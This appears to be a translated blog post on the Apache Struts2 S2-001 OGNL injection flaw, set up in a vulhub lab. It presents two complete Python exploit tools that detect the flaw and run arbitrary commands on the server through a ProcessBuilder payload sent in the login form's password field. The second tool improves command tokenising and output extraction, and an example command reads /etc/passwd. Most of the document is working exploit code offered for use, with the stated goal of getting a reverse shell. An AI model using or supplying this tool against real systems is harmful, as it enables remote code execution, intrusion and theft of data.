S2 series: S2-001, Syrian-version one-click exploitation

I won't say much about the S2-001 vulnerability itself; just build the target environment with vulhub. The script runs normally against a Linux target. Against a Windows target the response may come back with status 500; adding the request header Content-Type: application/x-www-form-urlencoded, which the server needs in order to parse the POST body as form parameters, makes it return normally. The script is written in Python. The output echo has some problems, including the jsessionid not being filtered out and letters missing from the command output, hence the name: Syrian version.
(Screenshot: the right side is the actual value, the left side is the script's output.) Looking at it, the difference is quite visible, but the command is certainly executed. The point of using this script is to get a reverse shell, since the flag file still has to be found.
The code is as follows:

import requests
from urllib import parse
import difflib


def mingling(url, headers):
    # Interactive loop: read a command, run it via zhixing(), ask whether to continue.
    while True:
        shell = input("Enter the command to run: ")
        if "exit" in shell:
            print("Done")
            return
        zhixing(shell, url, headers)
        shifou = input("Run another command? (1/0) ")
        if "1" not in shifou:
            print("Finished")
            return


def yanzheng(url):
    # Detection: %{2220+2} in the password field is evaluated as OGNL by a vulnerable
    # Struts2 and the login form echoes the result, 2222, back into the page.
    data = "username=200&password=%25%7b%32%32%32%30%2b%32%7d"  # %{2220+2}, URL-encoded
    url = url + "login.action"
    headers = {
        "Referer": url,
        # Needed on Windows targets; without it the POST body is not parsed and a 500 comes back.
        "Content-Type": "application/x-www-form-urlencoded",
    }
    body = requests.post(url, data=data, headers=headers).content.decode("utf-8", errors="replace")
    if "2222" in body:
        print("Target is vulnerable to S2-001")
        mingling(url, headers)
    else:
        print("Target does not appear vulnerable")


def ognl_exec(array_items):
    # S2-001 command-execution payload: ProcessBuilder runs the String[] given in
    # array_items, the first 50000 chars of its output are read into #e and written
    # straight into the HTTP response.
    return ('%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{' + array_items + '}))'
            '.redirectErrorStream(true).start(),#b=#a.getInputStream(),'
            '#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),'
            '#e=new char[50000],#d.read(#e),'
            '#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),'
            '#f.getWriter().println(new java.lang.String(#e)),'
            '#f.getWriter().flush(),#f.getWriter().close()}')


def zhixing(shell, url, headers):
    # Split the command on spaces and quote each part as a Java String[] element, e.g.
    #   cat /etc/passwd  ->  "cat","/etc/passwd"
    # (quoted arguments containing spaces are not supported by this split)
    c = ",".join('"' + part + '"' for part in shell.split(" "))
    # The payload is sent twice: once with an empty command (str1) as a baseline and
    # once with the real one (str2); diffing the two responses is what isolates the output.
    str1 = ognl_exec('""')
    str2 = ognl_exec(c)
    data1 = 'username=200&password=' + parse.quote(str1)
    data2 = 'username=200&password=' + parse.quote(str2)

    # str() of the raw bytes gives the repr, so "\x00" and "\n" below match the
    # two-character escape sequences in that repr, not real control characters.
    res1 = str(requests.post(url, data=data1, headers=headers).content)
    res2 = str(requests.post(url, data=data2, headers=headers).content)

    # difflib marks characters only present in res2 with "-", so real dashes are
    # parked as "¥" first and restored when printing; the char[50000] NUL padding
    # is dropped from the real response.
    res1 = res1.replace("-", "¥")
    res2 = res2.replace("\\x00", "").replace("-", "¥")
    a = ''.join(difflib.Differ().compare(res2, res1))
    b = [tok for tok in a.split(" ") if tok]

    # Collect the tokens that follow a "-" marker: the characters that exist only in
    # the real command's response. This is the step that drops letters now and then.
    x = ""
    for i, tok in enumerate(b):
        if "-" in tok and i + 1 < len(b):
            nxt = b[i + 1]
            if "-" in nxt:
                x = x + nxt.replace("-", "").replace("+", "")
            else:
                x = x + nxt.replace("&", "-").replace("+", "")

    print(">>>:", end="")
    if "\\n" in x:
        for z in x.split("\\n"):
            if z:
                print(z.replace("¥", "-") + "  ")
    else:
        print(x.replace("¥", "-"))


if __name__ == '__main__':
    # Base URL of the Struts2 app with a trailing slash, e.g. http://127.0.0.1:8080/
    url = input("Enter the URL to test: ")
    if not url.endswith("/"):
        url = url + "/"
    yanzheng(url)
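The two rough edges of the script above, splitting the command on every space and recovering the output by diffing two responses, are where the missing letters and the leaked jsessionid come from. The following is an added example, my own code rather than the author's script, that builds the same S2-001 ProcessBuilder payload but tokenises the command with shlex and escapes each argument as a Java string literal, and wraps the output in marker strings so it can be cut out of the page with a plain search instead of a diff. The marker values, the helper names, run_command and the constructed sample response are my assumptions; the OGNL chain and the %{2220+2} probe are the ones the script above uses.

```python
import shlex
from urllib.parse import quote

# Marker strings printed before and after the command output so it can be cut out of
# the surrounding Struts page deterministically (my choice, not the script's).
MARK_BEGIN = "__S2001_BEGIN__"
MARK_END = "__S2001_END__"

PROBE = "%{2220+2}"  # detection expression: a vulnerable Struts2 echoes 2222 back into the form


def java_string_literal(s):
    """Escape a Python str as a double-quoted Java/OGNL string literal."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'


def build_payload(command, begin=MARK_BEGIN, end=MARK_END):
    """Build the S2-001 OGNL expression that runs `command` through ProcessBuilder.

    The command is tokenised with shlex, so `sh -c "ls /tmp"` becomes three argv
    entries instead of being broken on every space.
    """
    argv = shlex.split(command)
    if not argv:
        raise ValueError("empty command")
    array = "new java.lang.String[]{" + ",".join(java_string_literal(a) for a in argv) + "}"
    return (
        "%{#a=(new java.lang.ProcessBuilder(" + array + ")).redirectErrorStream(true).start(),"
        "#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),"
        "#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),"
        '#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),'
        "#f.getWriter().println(" + java_string_literal(begin) + "),"
        "#f.getWriter().println(new java.lang.String(#e)),"
        "#f.getWriter().println(" + java_string_literal(end) + "),"
        "#f.getWriter().flush(),#f.getWriter().close()}"
    )


def form_body(expression, username="200"):
    """URL-encode the expression into the login form's password field."""
    return "username=" + quote(username, safe="") + "&password=" + quote(expression, safe="")


def looks_vulnerable(body):
    """True if the response to PROBE contains the evaluated result 2222."""
    text = body.decode("utf-8", "replace") if isinstance(body, bytes) else body
    return "2222" in text


def extract_output(body, begin=MARK_BEGIN, end=MARK_END):
    """Return the text between the markers with the char[50000] NUL padding removed,
    or None if the markers are absent (the payload was not evaluated)."""
    text = body.decode("utf-8", "replace") if isinstance(body, bytes) else body
    start = text.find(begin)
    if start == -1:
        return None
    start += len(begin)
    stop = text.find(end, start)
    if stop == -1:
        return None
    return text[start:stop].replace("\x00", "").strip()


def run_command(session, base_url, command):
    """POST the payload to <base_url>/login.action and return the extracted output.
    `session` is a requests.Session or any object with the same .post() signature."""
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    resp = session.post(base_url.rstrip("/") + "/login.action",
                        data=form_body(build_payload(command)), headers=headers)
    return extract_output(resp.content)


if __name__ == "__main__":
    # Constructed sample response (not captured from a real target) to show the parsing.
    sample = (b"<html>" + MARK_BEGIN.encode() + b"\r\nuid=0(root) gid=0(root)\x00\x00\x00\r\n"
              + MARK_END.encode() + b"\r\n<form>...</form></html>")
    print(build_payload('sh -c "ls /tmp"'))
    print(extract_output(sample))
```

Because the output is fenced by markers rather than diffed against a baseline, only one request per command is needed and the rest of the page (jsessionid included) never reaches the terminal; if extract_output returns None the expression was not evaluated at all, which is a more useful signal than a garbled diff.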

Corrections from the experts are welcome.
